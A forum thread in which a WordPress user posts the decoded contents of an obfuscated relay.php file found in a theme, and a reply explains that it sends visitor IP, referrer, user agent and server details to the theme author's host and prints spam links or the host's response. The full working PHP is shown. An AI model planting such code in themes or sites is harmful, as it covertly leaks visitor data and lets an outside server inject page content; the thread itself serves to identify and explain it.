i found weird file relay.php on my theme, this script encoded use gzinflate(str_rot13(base64_decode when i decode i found this code somebody can explain this code used for? thanks ?><? // set post variables $post_variables = array( 'ip_address' => $_SERVER['REMOTE_ADDR'], 'server_name' => $_SERVER['SERVER_NAME'], 'referrer' => $_SERVER['HTTP_REFERER'], 'request_uri' => $_SERVER['REQUEST_URI'], 'user_agent' => $_SERVER['HTTP_USER_AGENT'], 'server_software' => $_SERVER['SERVER_SOFTWARE'], 'server_signature' => $_SERVER['SERVER_SIGNATURE'] ); // covert to rawurlencodedformat foreach($post_variables as $key=>$value) $data .= $key.'='.rawurlencode($value).'&'; rtrim($data,'&'); // make call to API $sock = @fsockopen("http://www.wpthemeaday.com", 80, $errno, $errstr, 10); if (!$sock) echo 'Brought to you by: <a href="http://www.wpthemeaday.com" alt="Free Wordpress Theme Directory">Wordpress Themes</a> | <a href="http://www.thesworddepot.net" alt="Swords">Katana Swords</a> | <a href="http://www.satellitetvforpconline.com" alt="Satellite TV for PC Online">Satellite TV for PC</a> | <a href="http://www.swipetek.com" alt="Magnetic Card Readers">Magnetic Card Readers</a>'; else { // form header to post to API fwrite($sock, "POST /api/ HTTP/1.0\r\n"); fwrite($sock, "Host: wpthemeaday.com\r\n"); fwrite($sock, "User-Agent: API Client 1.0\r\n"); fwrite($sock, "Content-type: application/x-www-form-urlencoded\r\n"); fwrite($sock, "Content-length: " . strlen($data) . "\r\n"); fwrite($sock, "Accept: */*\r\n"); fwrite($sock, "\r\n"); fwrite($sock, $data."\r\n"); fwrite($sock, "\r\n"); // get response $headers = ""; while ($str = trim(fgets($sock, 4096))) $headers .= "$str\n"; // get response body $body = ""; while (!feof($sock)) $body .= fgets($sock, 4096); // output response from server echo $body; } ?><?
any time that script is ran, it's gathering details about your visitor and sending if back to the theme host. On top of that, it's displaying an ad (affiliate link) to your visitor.